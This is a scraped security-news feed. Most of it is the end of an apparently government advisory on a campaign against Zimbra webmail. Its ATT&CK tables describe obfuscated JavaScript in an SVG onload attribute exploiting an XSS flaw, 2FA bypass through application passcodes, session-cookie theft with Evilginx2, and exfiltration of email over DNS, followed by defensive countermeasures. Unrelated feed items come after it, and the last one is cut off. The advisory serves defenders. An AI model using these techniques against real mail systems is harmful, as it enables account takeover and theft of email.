<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 13: Persistence </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Account Manipulation </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1098/" target="_blank"><u>T1098</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Enabling IMAP and Application Passcodes provides persistent access to the compromised account. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Modify Authentication Process: Multi-Factor Authentication </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1556/006/" target="_blank"><u>T1556.006</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Creating Application Passcodes to bypass 2FA and stealing a user’s “Scratch Keys,” which can be used in place of a 2FA token. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 14: Privilege Escalation </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Valid Accounts </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1078/" target="_blank"><u>T1078</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>This actor has used commercial datasets to acquire account credentials and gain unauthorized privileged access to accounts.  </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<p><a class="ck-anchor"></a></p>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 15: Stealth </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Obfuscated Files or Information: Command Obfuscation </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1027/010/" target="_blank"><u>T1027.010</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Obfuscated JavaScript payload sent to targets to exploit the XSS vulnerability. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Obfuscated Files or Information: Encrypted/Encoded File </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1027/013/" target="_blank"><u>T1027.013</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>The JavaScript payload included both a Base64-encoded and XOR-encrypted inner payload. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Obfuscated Files or Information: SVG Smuggling </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1027/017/" target="_blank"><u>T1027.017</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>The payload was contained in an “onload” attribute within an SVG image included in the malicious email. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Use Alternate Authentication Material: Web Session Cookie </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1550/004/" target="_blank"><u>T1550.004</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Previous campaigns using AiTM leveraged stealing and use of a victim’s session cookies to authenticate. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 16: Credential Access </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Modify Authentication Process: Multi-Factor Authentication </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1556/006/" target="_blank"><u>T1556.006</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Creating Application Passcodes to bypass 2FA and stealing a user’s “Scratch Keys,” which can be used in place of a 2FA token. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Adversary-in-the-Middle </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1557/" target="_blank"><u>T1557</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Previous campaigns used Evilginx2 as an AiTM toolkit to intercept credentials and session cookies. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<p><a class="ck-anchor"></a></p>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 17: Collection </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Data Staged: Remote Data Staging </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1074/002/" target="_blank"><u>T1074.002</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Exfiltrated data was sent to an actor-controlled VPS prior to assumed long-term storage solutions. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Email Collection </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1114/" target="_blank"><u>T1114</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>This group has emphasized collection of emails. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Email Collection: Remote Email Collection </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1114/002/" target="_blank"><u>T1114.002</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Emails are collected via API calls to the ZCS mail server and are not collected from emails stored directly on the victim’s device. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Automated Collection </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1119/" target="_blank"><u>T1119</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Upon execution, the JavaScript payload automatically collects all relevant information in stages. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Browser Session Hijacking </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1185/" target="_blank"><u>T1185</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>The JavaScript payload leverages the user’s authenticated browser session to make API requests as the user. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Archive Collected Data </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1560/" target="_blank"><u>T1560</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Emails are exfiltrated with GZIP compression. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 18: Discovery </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Account Discovery </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1087/" target="_blank"><u>T1087</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Stolen Global Access Lists provide the group with new users to target. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<p><a class="ck-anchor"></a></p>
</div>
</div>
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<div class="TableContainer Ltr SCXW76044448 BCX8">
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 19: Exfiltration </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Technique Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p class="text-align-center"><strong>Use</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Exfiltration Over Alternative Protocol </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1048/" target="_blank"><u>T1048</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Victim information was exfiltrated over both HTTPS and DNS. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1048/002/" target="_blank"><u>T1048.002</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Some payloads, especially ones with large amounts of data, were exfiltrated over HTTPS. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p><a href="https://attack.mitre.org/versions/v19/techniques/T1048/003/" target="_blank"><u>T1048.003</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW76044448 BCX8">
<div class="OutlineElement Ltr SCXW76044448 BCX8">
<p>Some smaller bandwidth payloads were exfiltrated over DNS using Base32 encoding. </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<h2><strong>Appendix B: MITRE D3FEND countermeasures </strong><a class="ck-anchor"></a></h2>
<p>See <a href="https://www.cisa.gov/#table20"><strong>Table 20</strong></a> for a mapping of several of the cybersecurity countermeasures mentioned in this advisory. <a class="ck-anchor"></a></p>
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<div class="TableContainer Ltr SCXW46665017 BCX8">
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 20: MITRE D3FEND Countermeasures </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p class="text-align-center"><strong>Countermeasure Title</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p class="text-align-center"><strong>ID</strong> </p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p class="text-align-center"><strong>Description</strong> </p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Application Hardening </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:ApplicationHardening" target="_blank"><u>D3-AH</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="ListContainerWrapper SCXW46665017 BCX8">
<ul type="disc">
<li>Organizations should immediately prioritize patching <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376" target="_blank"><u>CVE-2025-66376</u></a>.  </li>
<li>Organizations should promptly apply software updates to all email systems. </li>
</ul>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Isolate </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/tactic/d3f:Isolate/" target="_blank"><u>d3f:Isolate</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Organizations that cannot feasibly patch should use alternative mail clients. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Credential Hardening </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:CredentialHardening" target="_blank"><u>D3-CH</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Organizations should consider using a third-party authentication service that supports passkeys to mediate access to ZCS and other services that do not natively support passkeys. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Network Traffic Analysis </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:NetworkTrafficAnalysis" target="_blank"><u>D3-NTA</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Organizations should monitor for significant amounts of outbound data being sent to IPs associated with VPS providers not used by the organization. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>DNS Traffic Analysis </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:DNSTrafficAnalysis" target="_blank"><u>D3-DNSTA</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Organizations should monitor for frequent DNS queries to a suspicious domain for seemingly random subdomains. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Network Traffic Community Deviation </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:NetworkTrafficCommunityDeviation" target="_blank"><u>D3-NTCD</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="ListContainerWrapper SCXW46665017 BCX8">
<ul type="disc">
<li>Organizations should monitor for a sudden spike of connections to a server associated with a recently established domain. </li>
<li>Organizations should monitor for connections to internal services, such as webmail, from VPN providers. </li>
</ul>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Identifier Activity Analysis </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:IdentifierActivityAnalysis" target="_blank"><u>D3-IAA</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Organizations should search for the listed known IOCs. </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p>Process Analysis </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="OutlineElement Ltr SCXW46665017 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:ProcessAnalysis" target="_blank"><u>D3-PA</u></a> </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW46665017 BCX8">
<div class="ListContainerWrapper SCXW46665017 BCX8">
<ul type="disc">
<li>Organizations should search ZCS log files for specific commands used by the malicious script. </li>
<li>Organizations should search the localStorage property in web browsers for the ZCS webmail client for “ZimbraWeb” Application Passcodes. </li>
</ul>
</div>
</div>
</td>
</tr>
<tr>
<td>Message Analysis</td>
<td><a href="https://d3fend.mitre.org/technique/d3f:MessageAnalysis">D3-MA</a></td>
<td>Organizations that suspect they have victims of this campaign should search for emails with a malicious payload to identify other victims.</td>
</tr>
</tbody>
</table>
</div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[[$] An operations structure for swap devices]]></title>
<description><![CDATA[One of the ideas raised at the 2026 Linux
Storage, Filesystem, Memory Management, and BPF Summit (LSFMM+BPF) was
the creation of an
operations structure for the swap subsystem.  Like many parts of the
kernel, the swap layer evolved over time, with pieces being added as
needed; the end result of t...]]></description>
<link>https://tsecurity.de/de/3689355/linux-tipps/an-operations-structure-for-swap-devices/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689355/linux-tipps/an-operations-structure-for-swap-devices/</guid>
<pubDate>Thu, 23 Jul 2026 16:29:33 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[One of the ideas raised at the <a href="https://lwn.net/Articles/lsfmmbpf2026/">2026 Linux
Storage, Filesystem, Memory Management, and BPF Summit</a> (LSFMM+BPF) was
the creation of <a href="https://lwn.net/Articles/1072657/#:~:text=Abstracting%20the%20swap%20backend">an
operations structure</a> for the swap subsystem.  Like many parts of the
kernel, the swap layer evolved over time, with pieces being added as
needed; the end result of this evolution is rarely what one would expect
had the subsystem been designed today.  The interface between the swap
layer and the devices it uses is just one example.  It appears that one
result of the swap subsystem's evolution — the lack of an abstraction layer
to interface with underlying storage — will soon be addressed, but in a
different way than was initially envisioned.]]></content:encoded>
</item>
<item>
<title><![CDATA[Which Brands Are Impersonated Most? Inside the Q2 2026 Brand Phishing Report]]></title>
<description><![CDATA[Key Takeaways Microsoft continues to be the single most impersonated brand in Q2 2026, appearing in 23% of all brand phishing attempts, far ahead of any other company The top five impersonated brands, Microsoft, LinkedIn, Google, Apple, and Amazon, together…
Read more →
The post Which Brands Are ...]]></description>
<link>https://tsecurity.de/de/3689293/it-security-nachrichten/which-brands-are-impersonated-most-inside-the-q2-2026-brand-phishing-report/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689293/it-security-nachrichten/which-brands-are-impersonated-most-inside-the-q2-2026-brand-phishing-report/</guid>
<pubDate>Thu, 23 Jul 2026 16:10:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Key Takeaways Microsoft continues to be the single most impersonated brand in Q2 2026, appearing in 23% of all brand phishing attempts, far ahead of any other company The top five impersonated brands, Microsoft, LinkedIn, Google, Apple, and Amazon, together…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/which-brands-are-impersonated-most-inside-the-q2-2026-brand-phishing-report/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/which-brands-are-impersonated-most-inside-the-q2-2026-brand-phishing-report/">Which Brands Are Impersonated Most? Inside the Q2 2026 Brand Phishing Report</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Black Hat USA 2026 - New Features]]></title>
<description><![CDATA[Author: Black Hat - Bewertung: 2x - Views:21 Black Hat USA 2026 isn't just bigger... It's built differently, and Black Hat is closing the gap between knowing and doing.  
